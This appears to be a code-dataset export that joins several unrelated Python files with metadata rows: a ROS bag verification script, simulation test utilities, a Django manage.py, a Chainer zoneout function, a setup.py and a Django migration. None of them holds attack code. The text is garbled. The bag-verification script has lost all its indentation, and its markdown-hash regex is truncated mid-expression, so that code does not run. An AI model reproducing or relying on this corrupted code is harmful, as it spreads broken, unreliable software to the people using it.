# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic in SPECIAL_TOPICS:
verify_special(bag_message, topic_connection, current_key)
return
if len(topic_connection.keys) == 0:
topic_connection.add_key(current_key)
return
lowest_diff = None
index = -1
for i, key in enumerate(topic_connection.keys):
diff = compare_keys(bag_message, current_key, key)
if diff is not None:
if lowest_diff is None or diff < lowest_diff:
lowest_diff = diff
index = i
if lowest_diff is None:
logger.debug('lowest_diff is None.\n' \
'current_key: %s;\n' \
'topic_connection: %s',
current_key,
topic_connection)
return
if lowest_diff == 1:
topic_connection.set_key(index, current_key)
logger.debug('lowest_diff == 1.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= 0 and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff <= 0 and len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff > FLAGS.tolerance and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff > FLAGS.tolerance and ' \
'len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= FLAGS.tolerance:
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
print('Topic {} does not line up by {} messages'.format(
bag_message.topic, lowest_diff))
CURRENT_REPORT.add_bad_topic(bag_message.topic, lowest_diff)
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
topic_connection.get_key(index))
topic_connection.set_key(index, current_key)
## Verify the contents of a single file
# @param file The path to the file to verify
# @param topic_connections All topic connections
def verify_file(file, topic_connections):
with rosbag.Bag(file, 'r') as bag:
bag_info = bag.get_type_and_topic_info()
topic_connections[file] = set(bag_info.topics.keys())
for topic, value in bag_info.topics.items():
if topic in ILLEGAL_TOPICS:
continue
topic_connection = topic_connections.get(topic)
if topic_connection:
topic_connection.connections = value.connections
else:
if topic in SPECIAL_TOPICS:
topic_connections[topic] = TopicConnection(
topic, value.connections, special_topic=True)
else:
topic_connections[topic] = TopicConnection(
topic, value.connections)
messages = bag.read_messages()
for bag_message in messages:
if bag_message.topic in ILLEGAL_TOPICS:
continue
current_key = get_message_key(bag_message)
verify(
bag_message,
topic_connections[bag_message.topic],
current_key
)
## Reset the keys for specific topics
# @param topic_connections All topic connections
# @param topics_to_clear The list of topics to clear the keys of
def reset_topics(topic_connections, topics_to_clear):
for topic in topics_to_clear:
topic_connection = topic_connections.get(topic)
if topic_connection is not None:
topic_connection.reset()
## Verify all the files in a directory
# @param files_list The list of file paths to verify
# @param tbc The TopicBagChecker to use for verification of bags
# and clearing of keys
def verify_files_in_directory(files_list, tbc):
logger = get_logger()
mode_pattern = r'^[a-zA-Z0-9_ -/()]*\d+_(?P<mode>.*)_\d+\.bag$'
topic_connections = {}
previous_mode = None
for file in files_list:
logger.info('Processing file %s', file)
if previous_mode is not None:
match = re.match(mode_pattern, file)
if match is not None:
current_mode = match.group('mode')
if current_mode != previous_mode:
topics_to_clear = tbc.process_bag(previous_mode,
current_mode)
reset_topics(topic_connections, topics_to_clear)
previous_mode = current_mode
else:
match = re.match(mode_pattern, file)
if match:
previous_mode = match.group('mode')
logger.debug('previous_mode: %s', previous_mode)
verify_file(file, topic_connections)
## Gets the path to the kml file
# Gets the path to the kml file using the kml-file command line argument first.
# If no command line parameter is found or it is invalid, it looks for a kml
# file in the directory that is currently being processed. If there is still no
# kml file found, the final place checked is in the ddr_data_director package
# @param directory The current directory being verified
# @returns String The path to the kml file
def get_kml_paths(directory):
logger = get_logger()
kml_glob_pattern = '{}/*.xml'
# Check if the user specified a kml file
if FLAGS.kml_path:
if not FLAGS.kml_path.endswith('/'):
kml_path = os.path.expanduser(FLAGS.kml_path)
if os.path.isfile(kml_path):
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.chosen_kml_name = os.path.basename(kml_path)
CURRENT_REPORT.kml_reason = \
'User specified a KML file for verification'
return [kml_path]
logger.info(
'"%s" is not a valid kml path. Attempting to find a kml in "%s"',
kml_path,
directory
)
# User did not specify a kml, attempt to find one in the current directory
kml_paths = glob.glob(kml_glob_pattern.format(directory))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was found in capture folder'
return kml_paths
# No kml in current directory, attempt to find one
# in the ddr_data_recorder ros package
ddr_dir = os.path.join(
SCRIPTS_PATH,
'dynamic_recording'
)
logger.info(
'No kml file in "%s". Attempting to find a kml in "%s"',
directory,
ddr_dir
)
kml_paths = glob.glob(kml_glob_pattern.format(ddr_dir))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was not found in capture ' \
'folder, but was found in the installation directory'
return kml_paths
logger.info('No kml files found.')
return []
## Gets the path to the markdown file
# Gets the path to the markdown file in the curent directory. If multiple files
# exist, one is picked at random (due to how glob works).
# @param directory The current directory being verified
# @returns String The path to the markdown file
def get_markdown_paths(directory):
markdown_paths = glob.glob(os.path.join(directory, '*.md'))
if len(markdown_paths) == 1:
return markdown_paths[0]
if markdown_paths:
return markdown_paths
logger = get_logger()
logger.info('No markdown files found in "%s"', directory)
return []
## Gets the kml hash from the markdown file
# Looks through the markdown file and finds the line that contains the hash of
# the kml file used when it was created
# @param markdown_path The path to the markdown file to get the hash from
# @returns String The hash of the kml from the markdown
def get_markdown_hash(markdown_path):
logger = get_logger()
try:
with open(markdown_path, 'rb', 0) as _file, \
mmap.mmap(_file.fileno(), 0, access=mmap.ACCESS_READ) \
as markdown_file:
search_result = re.search(
br' markdown_file
)
if search_result:
markdown_hash = search_result.group('hash').decode('utf-8')
if CURRENT_REPORT is not None:
CURRENT_REPORT.markdown_hash_exists = True
CURRENT_REPORT.markdown_hash = markdown_hash
logger.info('Hash for kml found in "%s"', markdown_path)
return markdown_hash
except ValueError:
pass
logger.info('No hash for kml found in "%s"', markdown_path)
return ''
## Verifies that the hash of the kml file and the hash from the markdown file
# match
# @param kml_path The path to the kml file to verify
# @param markdown_path The path to the markdown file to verify the kml against
# @returns Bool True if the hashes match, False if they do not
def verify_kml_hash(kml_paths, markdown_paths):
logger = get_logger()
for markdown_path in markdown_paths:
markdown_kml_hash = get_markdown_hash(markdown_path)
if markdown_kml_hash:
logger.debug('markdown_kml_hash = %s', markdown_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_markdown_name = \
os.path.basename(markdown_path)
break
for kml_path in kml_paths:
current_kml_hash = util.generate_hash(kml_path) # pylint: disable=no-member
if not markdown_kml_hash:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return False, kml_path
if current_kml_hash == markdown_kml_hash:
logger.debug('kml_hash = %s', current_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return True, kml_path
return False, ''
def write_report():
if CURRENT_REPORT is not None:
with CURRENT_REPORT:
CURRENT_REPORT.write_header()
CURRENT_REPORT.write_settings(**vars(FLAGS))
CURRENT_REPORT.write_kml_section()
CURRENT_REPORT.write_files_verified()
CURRENT_REPORT.write_unverified_topics(ILLEGAL_TOPICS)
CURRENT_REPORT.write_bad_topics()
def main():
global CURRENT_REPORT # pylint: disable=global-statement
argv = [sys.argv[0]] + parse_args(sys.argv[1:])
logger = get_logger()
logger.debug('FLAGS=%s', FLAGS)
logger.debug('argv=%s', argv)
logger.info('Unable to verify the following topics:\n%s', pprint.pformat(
ILLEGAL_TOPICS))
logger.info('Topics requiring special handling:\n%s', pprint.pformat(
SPECIAL_TOPICS))
directories = map(os.path.expanduser, FLAGS.directories)
for directory in directories:
if os.path.isdir(directory):
logger.info('Processing directory "%s"', directory)
CURRENT_REPORT = VerificationReport(directory)
kml_paths = get_kml_paths(directory)
if not kml_paths:
print('Unable to verify "{}". No kml found.'.format(directory))
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = False
write_report()
continue
markdown_paths = get_markdown_paths(directory)
if not markdown_paths:
print('Unable to verify "{}". No markdown ' \
'to compare kml hash against.'.format(directory))
else:
hash_verified, kml_path = verify_kml_hash(
kml_paths, markdown_paths)
if CURRENT_REPORT is not None:
CURRENT_REPORT.matching_hashes = hash_verified
if not hash_verified:
print('Unable to verify {}. KML and markdown ' \
'hashes do not match.'.format(directory))
tbc = TopicBagChecker(kml_path)
files_list = util.get_sorted_files_list(directory) # pylint: disable=no-member
if CURRENT_REPORT is not None:
CURRENT_REPORT.files_list = files_list
verify_files_in_directory(files_list, tbc)
else:
logger.info('"%s" is not a directory.', directory)
write_report()
if __name__ == '__main__':
main()
| true
| true
|
f707b9a52128990810436baec085b0207d9a58e1
| 8,369
|
py
|
Python
|
tests/testing/test_utils.py
|
KarrLab/wc_sim
|
5b0ee03c3d19193fa67a3797d4258b753e6bc576
|
[
"MIT"
] | 8
|
2018-03-27T21:35:25.000Z
|
2022-01-18T08:32:20.000Z
|
tests/testing/test_utils.py
|
KarrLab/wc_sim
|
5b0ee03c3d19193fa67a3797d4258b753e6bc576
|
[
"MIT"
] | 114
|
2018-02-27T14:14:39.000Z
|
2020-12-30T15:06:51.000Z
|
tests/testing/test_utils.py
|
KarrLab/wc_sim
|
5b0ee03c3d19193fa67a3797d4258b753e6bc576
|
[
"MIT"
] | 2
|
2019-04-05T16:17:28.000Z
|
2020-05-17T12:55:20.000Z
|
""" Test utilities for testing
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2019-10-31
:Copyright: 2019, Karr Lab
:License: MIT
"""
from scipy.constants import Avogadro
import os
import shutil
import tempfile
import unittest
from de_sim.simulation_config import SimulationConfig
from wc_sim.multialgorithm_simulation import MultialgorithmSimulation
from wc_sim.sim_config import WCSimulationConfig
from wc_sim.simulation import Simulation
from wc_sim.testing.make_models import MakeModel
from wc_sim.testing.utils import (check_simul_results, plot_expected_vs_simulated, get_expected_dependencies,
create_run_directory)
class TestTestingUtils(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
self.results_dir = tempfile.mkdtemp(dir=self.tmp_dir)
self.args = dict(results_dir=tempfile.mkdtemp(dir=self.tmp_dir),
checkpoint_period=1)
de_simulation_config = SimulationConfig(max_time=10, output_dir=tempfile.mkdtemp(dir=self.tmp_dir))
self.wc_sim_config = WCSimulationConfig(de_simulation_config, checkpoint_period=1)
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_check_simul_results(self):
init_volume = 1E-16
init_density = 1000
molecular_weight = 100.
default_species_copy_number = 10_000
init_accounted_mass = molecular_weight * default_species_copy_number / Avogadro
init_accounted_density = init_accounted_mass / init_volume
expected_initial_values_compt_1 = dict(
init_volume=init_volume,
init_accounted_mass=init_accounted_mass,
init_mass= init_volume * init_density,
init_density=init_density,
init_accounted_density=init_accounted_density,
accounted_fraction = init_accounted_density / init_density
)
expected_initial_values = {'compt_1': expected_initial_values_compt_1}
model = MakeModel.make_test_model('1 species, 1 reaction',
init_vols=[expected_initial_values_compt_1['init_volume']],
init_vol_stds=[0],
density=init_density,
molecular_weight=molecular_weight,
default_species_copy_number=default_species_copy_number,
default_species_std=0,
submodel_framework='WC:deterministic_simulation_algorithm')
multialgorithm_simulation = MultialgorithmSimulation(model, self.wc_sim_config)
_, dynamic_model = multialgorithm_simulation.build_simulation()
check_simul_results(self, dynamic_model, None, expected_initial_values=expected_initial_values)
# test dynamics
simulation = Simulation(model)
results_dir = simulation.run(max_time=2, **self.args).results_dir
nan = float('NaN')
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]},
rel_tol=1E-5)
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 9.999e-14, 9.998e-14]}})
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[nan, nan, nan]}})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}},
rel_tol=0)
plots_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'results'))
os.makedirs(plots_dir, exist_ok=True)
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]},
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]},
expected_property_trajectories=\
{'compt_1':
{'mass':[nan, nan, nan]}})
def test_expected_dependencies(self):
eds = get_expected_dependencies()
self.assertEqual(eds['DynamicStopCondition']['reaction_9'], {'stop_condition_7'})
self.assertEqual(eds['DynamicStopCondition']['reaction_10'], set())
def test_create_run_directory(self):
def run_dir_test(self, run_dir):
self.assertTrue(os.path.isdir(run_dir))
os.rmdir(run_dir)
# rm the date dir if it's empty
try:
date_dir = os.path.abspath(os.path.join(run_dir, ".."))
os.rmdir(date_dir)
except OSError:
pass
run_dir_test(self, create_run_directory())
run_dir_test(self, create_run_directory(base_dir='/tmp/runs', in_repo=False))
| 52.30625
| 109
| 0.556936
|
from scipy.constants import Avogadro
import os
import shutil
import tempfile
import unittest
from de_sim.simulation_config import SimulationConfig
from wc_sim.multialgorithm_simulation import MultialgorithmSimulation
from wc_sim.sim_config import WCSimulationConfig
from wc_sim.simulation import Simulation
from wc_sim.testing.make_models import MakeModel
from wc_sim.testing.utils import (check_simul_results, plot_expected_vs_simulated, get_expected_dependencies,
create_run_directory)
class TestTestingUtils(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
self.results_dir = tempfile.mkdtemp(dir=self.tmp_dir)
self.args = dict(results_dir=tempfile.mkdtemp(dir=self.tmp_dir),
checkpoint_period=1)
de_simulation_config = SimulationConfig(max_time=10, output_dir=tempfile.mkdtemp(dir=self.tmp_dir))
self.wc_sim_config = WCSimulationConfig(de_simulation_config, checkpoint_period=1)
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_check_simul_results(self):
init_volume = 1E-16
init_density = 1000
molecular_weight = 100.
default_species_copy_number = 10_000
init_accounted_mass = molecular_weight * default_species_copy_number / Avogadro
init_accounted_density = init_accounted_mass / init_volume
expected_initial_values_compt_1 = dict(
init_volume=init_volume,
init_accounted_mass=init_accounted_mass,
init_mass= init_volume * init_density,
init_density=init_density,
init_accounted_density=init_accounted_density,
accounted_fraction = init_accounted_density / init_density
)
expected_initial_values = {'compt_1': expected_initial_values_compt_1}
model = MakeModel.make_test_model('1 species, 1 reaction',
init_vols=[expected_initial_values_compt_1['init_volume']],
init_vol_stds=[0],
density=init_density,
molecular_weight=molecular_weight,
default_species_copy_number=default_species_copy_number,
default_species_std=0,
submodel_framework='WC:deterministic_simulation_algorithm')
multialgorithm_simulation = MultialgorithmSimulation(model, self.wc_sim_config)
_, dynamic_model = multialgorithm_simulation.build_simulation()
check_simul_results(self, dynamic_model, None, expected_initial_values=expected_initial_values)
simulation = Simulation(model)
results_dir = simulation.run(max_time=2, **self.args).results_dir
nan = float('NaN')
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]},
rel_tol=1E-5)
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 9.999e-14, 9.998e-14]}})
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[nan, nan, nan]}})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}},
rel_tol=0)
plots_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'results'))
os.makedirs(plots_dir, exist_ok=True)
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]},
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]},
expected_property_trajectories=\
{'compt_1':
{'mass':[nan, nan, nan]}})
def test_expected_dependencies(self):
eds = get_expected_dependencies()
self.assertEqual(eds['DynamicStopCondition']['reaction_9'], {'stop_condition_7'})
self.assertEqual(eds['DynamicStopCondition']['reaction_10'], set())
def test_create_run_directory(self):
def run_dir_test(self, run_dir):
self.assertTrue(os.path.isdir(run_dir))
os.rmdir(run_dir)
try:
date_dir = os.path.abspath(os.path.join(run_dir, ".."))
os.rmdir(date_dir)
except OSError:
pass
run_dir_test(self, create_run_directory())
run_dir_test(self, create_run_directory(base_dir='/tmp/runs', in_repo=False))
| true
| true
|
f707b9b5d7a17b991547f656a386101cbfa92cf6
| 630
|
py
|
Python
|
manage.py
|
rudmanmrrod/watchin-sge
|
4fd6d115844776a4763266bd7f0da02eb104f2b4
|
[
"MIT"
] | null | null | null |
manage.py
|
rudmanmrrod/watchin-sge
|
4fd6d115844776a4763266bd7f0da02eb104f2b4
|
[
"MIT"
] | 15
|
2019-06-28T13:29:00.000Z
|
2022-02-10T13:04:27.000Z
|
manage.py
|
rudmanmrrod/watchin-crm
|
4fd6d115844776a4763266bd7f0da02eb104f2b4
|
[
"MIT"
] | 1
|
2019-06-23T22:08:40.000Z
|
2019-06-23T22:08:40.000Z
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WatchInSGE.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.636364
| 74
| 0.684127
|
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WatchInSGE.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| true
| true
|
f707ba5f9a433519d7a5c0fa0beed5db34669b0c
| 2,333
|
py
|
Python
|
chainer/functions/noise/zoneout.py
|
Evanc123/chainer
|
929af7189b1271683200aa9b0ba6da2dd3dee110
|
[
"MIT"
] | null | null | null |
chainer/functions/noise/zoneout.py
|
Evanc123/chainer
|
929af7189b1271683200aa9b0ba6da2dd3dee110
|
[
"MIT"
] | null | null | null |
chainer/functions/noise/zoneout.py
|
Evanc123/chainer
|
929af7189b1271683200aa9b0ba6da2dd3dee110
|
[
"MIT"
] | null | null | null |
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
class Zoneout(function_node.FunctionNode):
"""Zoneout regularization."""
def __init__(self, zoneout_ratio):
self.zoneout_ratio = zoneout_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
def forward(self, inputs):
self.retain_inputs(())
h, x = inputs
xp = cuda.get_array_module(*x)
if xp is numpy:
flag_x = xp.random.rand(*x.shape) >= self.zoneout_ratio
else:
flag_x = (xp.random.rand(*x.shape) >=
self.zoneout_ratio)
self.flag_h = xp.ones_like(flag_x) ^ flag_x
self.flag_x = flag_x
return h * self.flag_h + x * self.flag_x,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
ret = []
if 0 in indexes:
ret.append(gy * self.flag_h)
if 1 in indexes:
ret.append(gy * self.flag_x)
return ret
def zoneout(h, x, ratio=.5, **kwargs):
"""zoneout(h, x, ratio=.5)
Drops elements of input variable and sets to previous variable randomly.
This function drops input elements randomly with probability ``ratio`` and
instead sets dropping element to their previous variable. In testing mode ,
it does nothing and just returns ``x``.
.. warning::
``train`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('train', train)``.
See :func:`chainer.using_config`.
Args:
h (~chainer.Variable): Previous variable.
x (~chainer.Variable): Input variable.
ratio (float): Zoneout ratio.
Returns:
~chainer.Variable: Output variable.
See the paper: `Zoneout: Regularizing RNNs by Randomly Preserving Hidden \
Activations <https://arxiv.org/abs/1606.01305>`_.
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
if configuration.config.train:
return Zoneout(ratio).apply((h, x))[0]
return x
| 29.1625
| 79
| 0.638663
|
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
class Zoneout(function_node.FunctionNode):
def __init__(self, zoneout_ratio):
self.zoneout_ratio = zoneout_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
def forward(self, inputs):
self.retain_inputs(())
h, x = inputs
xp = cuda.get_array_module(*x)
if xp is numpy:
flag_x = xp.random.rand(*x.shape) >= self.zoneout_ratio
else:
flag_x = (xp.random.rand(*x.shape) >=
self.zoneout_ratio)
self.flag_h = xp.ones_like(flag_x) ^ flag_x
self.flag_x = flag_x
return h * self.flag_h + x * self.flag_x,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
ret = []
if 0 in indexes:
ret.append(gy * self.flag_h)
if 1 in indexes:
ret.append(gy * self.flag_x)
return ret
def zoneout(h, x, ratio=.5, **kwargs):
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
if configuration.config.train:
return Zoneout(ratio).apply((h, x))[0]
return x
| true
| true
|
f707baca67d5ac400a8642a3a09ab91d38f7b40d
| 1,841
|
py
|
Python
|
setup.py
|
Sage-Bionetworks/tool-registry-client
|
88abc84a51e3843bff73b4f958571646d4ccc3cd
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
Sage-Bionetworks/tool-registry-client
|
88abc84a51e3843bff73b4f958571646d4ccc3cd
|
[
"Apache-2.0"
] | 1
|
2020-12-09T17:55:11.000Z
|
2021-12-21T18:40:13.000Z
|
setup.py
|
Sage-Bionetworks/tool-registry-client
|
88abc84a51e3843bff73b4f958571646d4ccc3cd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
# basic
name='tool-registry-client',
version='0.1.0',
# packages=setuptools.find_packages(exclude=["tests", "tests.*"]),
# py_modules=['hello'],
# scripts=['bin/nlp-evaluate'],
packages=setuptools.find_packages(),
entry_points={
# 'console_scripts': ['rocc-cli=roccclient.cli.__main__:main']
},
# requirements
python_requires='>=3.6.*',
install_requires=[
'click>=7.1.2',
'jsonschema>=3.2.0',
'synapseclient>=2.2.0'
],
# metadata to display on PyPI
description='Tool Registry Library for Python',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Sage-Bionetworks/tool-registry-client',
author='The Tool Registry Team',
author_email='thomas.schaffter@sagebionetworks.org',
license='Apache',
project_urls={
"Source Code": "https://github.com/Sage-Bionetworks/tool-registry-client", # noqa: E501
"Bug Tracker": "https://github.com/Sage-Bionetworks/tool-registry-client/issues", # noqa: E501
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Bio-Informatics'
]
)
| 33.472727
| 103
| 0.632265
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='tool-registry-client',
version='0.1.0',
packages=setuptools.find_packages(),
entry_points={
},
python_requires='>=3.6.*',
install_requires=[
'click>=7.1.2',
'jsonschema>=3.2.0',
'synapseclient>=2.2.0'
],
description='Tool Registry Library for Python',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Sage-Bionetworks/tool-registry-client',
author='The Tool Registry Team',
author_email='thomas.schaffter@sagebionetworks.org',
license='Apache',
project_urls={
"Source Code": "https://github.com/Sage-Bionetworks/tool-registry-client", "Bug Tracker": "https://github.com/Sage-Bionetworks/tool-registry-client/issues", },
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Bio-Informatics'
]
)
| true
| true
|
f707bcdaa7a7741b72aedb923c21c3cc3a57b457
| 724
|
py
|
Python
|
mep/accounts/migrations/0019_allow_null_precision.py
|
making-books-ren-today/test_eval_3_shxco
|
5a6427abeb4aec1aa70c0d9a4b32d028012780c8
|
[
"Apache-2.0"
] | 3
|
2020-05-12T19:19:41.000Z
|
2021-04-07T13:56:32.000Z
|
mep/accounts/migrations/0019_allow_null_precision.py
|
making-books-ren-today/test_eval_3_shxco
|
5a6427abeb4aec1aa70c0d9a4b32d028012780c8
|
[
"Apache-2.0"
] | 736
|
2017-06-21T16:24:42.000Z
|
2022-02-26T17:46:10.000Z
|
mep/accounts/migrations/0019_allow_null_precision.py
|
making-books-ren-today/test_eval_3_shxco
|
5a6427abeb4aec1aa70c0d9a4b32d028012780c8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-04-20 18:17
from __future__ import unicode_literals
from django.db import migrations
import mep.accounts.models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0018_merge_20180418_1607'),
]
operations = [
migrations.AlterField(
model_name='borrow',
name='end_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
migrations.AlterField(
model_name='borrow',
name='start_date_precision',
field=mep.accounts.partial_date.DatePrecisionField(blank=True, null=True),
),
]
| 26.814815
| 86
